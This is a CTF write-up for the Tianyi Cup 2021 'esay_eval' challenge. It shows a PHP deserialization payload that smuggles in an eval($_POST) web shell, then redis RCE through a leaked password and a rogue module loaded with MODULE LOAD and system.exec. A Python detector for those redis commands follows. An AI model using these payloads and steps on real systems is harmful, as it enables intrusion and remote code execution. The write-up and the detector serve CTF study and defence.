# [Tianyi Cup (天翼杯) 2021] esay_eval
exp
```php
<?php
highlight_file(__FILE__);

class A {
    public $code = "eval(\$_POST[1]);";
}

class B {
    public $a;

    function __construct() {
        $this->a = new A();
    }
}

$c = new B();
$poc = serialize($c);
// echo $poc."<br>";
// Rewrite the nested object header: class name A -> a, declared property count 1 -> 2.
$payload = str_replace('A":1', 'a":2', $poc);
echo '?poc=' . $payload;
```
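After connecting with AntSword, a leaked vim swap file turns up. Recovering it with vim shows that the challenge uses redis, which is then used for RCE.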
```
redis password: you_cannot_guess_it
redis management plugin (AntSword):
git clone https://github.com/Medicean/AS_Redis.git
malicious exp:
git clone https://github.com/Dliv3/redis-rogue-server.git
```
- Upload exp.so to /var/www/html
- Connect to redis and run the command `MODULE LOAD "/var/www/html/exp.so"`
- RCE: `system.exec "your command"`
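
Seen from the defender's side, the steps above leave a clear trace in the redis command stream. The following added example (not part of the original writeup) scans redis `MONITOR` output for module loads and for the `system.exec` command; the sample lines and the allowed module directory `/usr/lib/redis/modules/` are constructed assumptions.

```python
import posixpath
import re
import shlex

# Assumption: legitimate modules live only under this directory.
ALLOWED_MODULE_DIR = "/usr/lib/redis/modules/"

# MONITOR line format: <unix-ts> [<db> <client>] "cmd" "arg" ...
MONITOR_RE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.+)$')

def parse_monitor_line(line):
    """Return (client, argv) for a MONITOR line, or None if it does not parse."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    try:
        argv = shlex.split(m.group(4))  # handles the quoted, backslash-escaped args
    except ValueError:
        return None
    return (m.group(3), argv) if argv else None

def findings(lines):
    """Flag MODULE LOAD/LOADEX and the module-provided system.exec command."""
    out = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        client, argv = parsed
        cmd = argv[0].upper()
        if cmd == "MODULE" and len(argv) >= 3 and argv[1].upper() in ("LOAD", "LOADEX"):
            # Normalise first so "../" cannot fake an allowed prefix.
            path = posixpath.normpath(argv[2])
            sev = "review" if path.startswith(ALLOWED_MODULE_DIR) else "high"
            out.append((sev, client, "module load: " + path))
        elif cmd == "SYSTEM.EXEC":
            out.append(("high", client, "system.exec: " + " ".join(argv[1:])))
    return out

# Constructed sample input, not captured from the challenge.
SAMPLE = [
    '1634567890.100001 [0 127.0.0.1:51000] "GET" "session:1"',
    '1634567890.200002 [0 127.0.0.1:51000] "MODULE" "LOAD" "/var/www/html/exp.so"',
    '1634567890.300003 [0 127.0.0.1:51000] "system.exec" "id"',
    '1634567891.000004 [0 10.0.0.5:40000] "module" "load" "/usr/lib/redis/modules/../../../../tmp/x.so"',
]

if __name__ == "__main__":
    for sev, client, what in findings(SAMPLE):
        print(sev, client, what)
```

A module load from a web-writable path such as `/var/www/html` is the strongest signal here, since that directory is where the uploaded `exp.so` lands.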